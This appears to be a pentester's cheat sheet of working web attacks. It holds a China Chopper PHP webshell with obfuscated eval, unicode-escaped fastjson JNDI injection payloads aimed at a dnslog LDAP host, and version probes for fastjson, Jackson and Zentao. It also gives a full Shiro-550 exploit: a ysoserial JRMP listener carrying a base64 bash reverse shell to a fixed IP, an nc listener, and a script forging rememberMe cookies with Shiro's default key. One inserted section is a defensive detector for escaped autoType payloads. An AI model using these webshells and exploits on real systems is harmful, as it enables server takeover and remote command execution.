China Chopper webshell (菜刀马)

```php
<?php
@$a = $_POST['Hello'];
if(isset($a)){
@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
```

The password is Hello. Although the base64 decodes to [@eval(base64_decode($_POST[z0]));], the password is still Hello, not z0. Also, a China Chopper webshell's password cannot be z0 through z9 (the client uses those as its own parameter names, as the z0 above shows).
fastjson

WAF-bypass payloads:

```json
{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://986pf8.dnslog.cn","autoCommit":true}}
{"@type":"java.lang.Exception","@type":"com.fastjson.demo.poc.poc","s":"calc"}
```
Pinpointing the exact fastjson version:

POST body contents:

```json
{"@type": "java.lang.AutoCloseable"
[
"a":""
;
```

DNS-based probes (val is your dnslog domain):

```json
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
```
Malformed variant (the val field is a placeholder for your dnslog domain):

```json
{"@type":"java.net.InetSocketAddress"{"address":,"val":"这里是dnslog"}}
```
Source: [https://blog.csdn.net/SuPejkj/article/details/109190901](https://blog.csdn.net/SuPejkj/article/details/109190901)
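As an added defensive example (not code from the page or from any WAF product), the check below decodes `\uXXXX` escapes before looking for `@type`, which is exactly the step a literal-string filter skips and the unicode-escaped payload above relies on; it also keeps seeing `@type` in truncated probe bodies that no parser accepts. The class watch-list and the sample bodies are constructed for this example.

```python
import json
import re
# A JSON parser turns "\u0040\u0074\u0079\u0070\u0065" into "@type", so a
# filter that searches the raw body for the literal text @type never sees
# it. fastjson's lexer additionally accepts the two-digit \xHH form.
_ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')
_AUTOTYPE = re.compile(r'"@type"\s*:\s*"([^"]*)"')

# Watch-list taken from the classes in the payloads above (constructed for
# this example; production would use a fuller denylist).
SUSPICIOUS = {"com.sun.rowset.JdbcRowSetImpl", "java.lang.Class",
              "java.lang.AutoCloseable", "java.net.Inet4Address",
              "java.net.Inet6Address", "java.net.InetSocketAddress"}

def unescape(body: str) -> str:
    """Decode \\uXXXX / \\xHH escapes the way the target parser will."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), body)

def _walk(node, out: list) -> None:
    """Collect @type values from a parsed tree (keys are already decoded)."""
    if isinstance(node, dict):
        if isinstance(node.get("@type"), str):
            out.append(node["@type"])
        for v in node.values():
            _walk(v, out)
    elif isinstance(node, list):
        for v in node:
            _walk(v, out)

def find_autotype(body: str):
    """(@type values in first-seen order, body parsed OK?). The regex pass
    runs on the unescaped text so duplicate keys and truncated probes like
    {"@type": "java.lang.AutoCloseable" are still seen; parsing adds the rest."""
    found = _AUTOTYPE.findall(unescape(body))
    try:
        _walk(json.loads(body), found)
        well_formed = True
    except ValueError:
        well_formed = False
    return list(dict.fromkeys(found)), well_formed

def inspect(body: str) -> dict:
    types, well_formed = find_autotype(body)
    hits = sorted(t for t in types if t in SUSPICIOUS)
    return {"types": types, "hits": hits, "well_formed": well_formed,
            "block": bool(hits) or (bool(types) and not well_formed)}
# Constructed samples modelled on the payloads above (not captured traffic).
ESCAPED = r'{"x":{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://example.invalid/a","autoCommit":true}}'
PROBE = '{"@type": "java.lang.AutoCloseable"'
BENIGN = '{"name":"alice","@type_note":"not a type key"}'
```

Where the application does not need autoType at all, the simpler policy is to reject any body whose `types` list is non-empty instead of maintaining a denylist.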
Jackson

Rough version detection:

In the 1.x libraries, package names start with org.codehaus.jackson.xxx; in the 2.x libraries they start with com.fasterxml.jackson.xxx.
Zentao (禅道) version check

Version: /zentao/index.php?mode=getconfig
Login page: /zentao/user-login-L3plbnRhby8=.html
Manual Shiro

1. Shiro-550 manual getshell

- First, have ysoserial-master.jar ready.
- Step 1: start a JRMP listener on the VPS: `java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjE1Ljk0LjEwNy8xODg4IDA+JjE=}|{base64,-d}|{bash,-i}'`, where the base64 decodes to bash -i >& /dev/tcp/1.15.94.107/1888 0>&1.
- Step 2: listen on port 1888 on the VPS: nc -lvvp 1888.
- Step 3: generate the payload: python shiro-exp.py vps:1099, where shiro-exp.py contains:
```python
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES


def encode_rememberme(command):
    # Have ysoserial build the JRMPClient payload that points at the JRMP listener.
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-master.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding to the AES block size.
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # Shiro's default rememberMe key; replace it if the target uses a different one.
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    #key = base64.b64decode("Z3VucwAAAAAAAAAAAAAAAA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # Cookie value is base64(iv || AES-CBC ciphertext).
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))
```

Replace the key in the script if needed.